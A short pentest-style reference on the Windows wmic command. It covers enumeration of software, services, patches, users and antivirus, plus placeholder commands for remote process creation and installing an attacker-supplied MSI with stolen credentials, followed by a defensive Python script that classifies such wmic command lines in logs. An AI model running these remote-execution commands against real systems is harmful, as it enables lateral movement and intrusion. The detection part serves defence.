# wmic

The wmic command on Windows is extremely useful, but is also deprecated (*because* of its usefulness to attackers!). It can be used on Windows 10 21H1 and earlier. For later systems, PowerShell cmdlets will need to be used instead (which increases the risk that activity will be logged).

- `wmic product get name,version,vendor` - list all installed software (but misses 32-bit applications installed on a 64-bit OS)
- `wmic service get name,displayname,pathname,startmode` - list all services
- `wmic qfe get caption,description,hotfixid,installedon` - list installed updates
- `wmic service list brief` - another way of listing services
- `wmic service where "name like '$SERVICE_NAME'" get name,pathname` - get information about a particular service
- `wmic /namespace:\\root\securitycenter2 path antivirusproduct` - enumerate antivirus
- `wmic useraccount get name,sid` - display SIDs for all (local) users

## Remote process creation

```powershell
# $TARGET_* and $SOME_COMMAND are placeholders
wmic.exe /user:$TARGET_USER `
    /password:$TARGET_PASSWORD `
    /node:$TARGET_HOST `
    process call create "$SOME_COMMAND"
```

## Install an MSI package

```powershell
# $TARGET_* and $PATH_TO_ATTACKER_MSI are placeholders
wmic.exe /user:$TARGET_USER `
    /password:$TARGET_PASSWORD `
    /node:$TARGET_HOST `
    product call install PackageLocation=$PATH_TO_ATTACKER_MSI
```
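
A defender-side view of the two remote commands above, as an added example that is not part of the original page: a Python classifier for process-creation command lines, assuming they come from a source such as Security event 4688 or Sysmon event 1. The function name, severity labels and sample lines are constructed for illustration.

```python
import re
import shlex

# Global wmic switches seen in the remote-use commands above (value follows the colon).
SWITCH_RE = re.compile(r"^/(node|user|password):(.*)$", re.IGNORECASE)
LOCAL_NODES = {".", "localhost", "127.0.0.1"}
# (alias, method) pairs that execute code or install software on the target.
EXEC_CALLS = {("process", "create"): "process_create",
              ("product", "install"): "msi_install"}

def classify_wmic(cmdline):
    """Classify one process-creation command line; None if it is not wmic."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                              # unbalanced quotes
        tokens = cmdline.split()
    if not tokens:
        return None
    image = re.split(r"[\\/]", tokens[0].strip('"'))[-1].lower()
    if image not in ("wmic", "wmic.exe"):
        return None
    switches, rest = {}, []
    for tok in tokens[1:]:
        m = SWITCH_RE.match(tok)
        if m:
            switches[m.group(1).lower()] = m.group(2).strip('"')
        else:
            rest.append(tok.lower())
    action = "query"
    if len(rest) >= 3 and rest[1] == "call":
        action = EXEC_CALLS.get((rest[0], rest[2]), "other_call")
    node = switches.get("node")
    remote = node is not None and node.lower() not in LOCAL_NODES
    executes = action in EXEC_CALLS.values()
    # Severity labels are this example's own assumption, not a standard.
    severity = "high" if executes and remote else "medium" if executes else "low"
    return {"action": action, "remote": remote, "node": node,
            "password_on_cmdline": "password" in switches, "severity": severity}

# Constructed sample command lines (hosts, accounts and paths are made up).
SAMPLES = [
    r'wmic service get name,displayname,pathname,startmode',
    r'C:\Windows\System32\wbem\WMIC.exe /user:CORP\svc_backup /password:Example123 '
    r'/node:10.0.0.5 process call create "cmd.exe /c whoami"',
    r'wmic.exe /node:FILESRV01 product call install PackageLocation=C:\Temp\setup.msi',
    r'powershell.exe -NoProfile Get-Service',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify_wmic(line), "<-", line)
```

A `password_on_cmdline` hit is worth alerting on by itself, since the credential is then recorded in cleartext wherever command lines are logged.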